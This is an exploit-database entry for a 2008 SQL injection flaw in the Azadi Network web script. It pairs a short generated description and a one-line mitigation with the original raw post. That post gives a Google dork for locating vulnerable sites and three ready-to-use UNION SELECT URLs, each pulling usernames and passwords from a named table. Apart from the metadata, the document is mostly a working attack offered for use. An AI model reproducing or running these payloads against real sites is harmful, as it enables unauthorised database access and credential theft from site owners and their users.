Azadi Network (page) Remote SQL Injection Vulnerability

vendor:

Azadi Network

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Azadi Network

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Azadi Network (page) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable page parameter. The crafted query can be used to extract sensitive information from the database such as usernames and passwords. The vulnerable page parameter is ‘page’ and the vulnerable parameter is ‘bi’. The crafted query is ‘index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+tb_kuserfara--’, ‘index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+bakact--’ and ‘index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+bekhantemp--’.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

|___________________________________________________
|
|  Azadi Network (page) Remote SQL Injection Vulnerability
|___________________________________________________
|--------------------    Hussin X  -------------------
|
|    Author:  Hussin X
|
|    Home :  WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
|    email  :  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|
| script    :  www.azadinet.net<http://www.azadinet.net>
|
| DorK   : "Powered By Azadi Network"
|___________________________________________________

Exploit:
________

index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+tb_kuserfara--

index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+bakact--

index.php?page=30&bi=-1+union+select+1,concat(UserName,0x3e,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+FROM+bekhantemp--


IQ-SecuritY FoRuM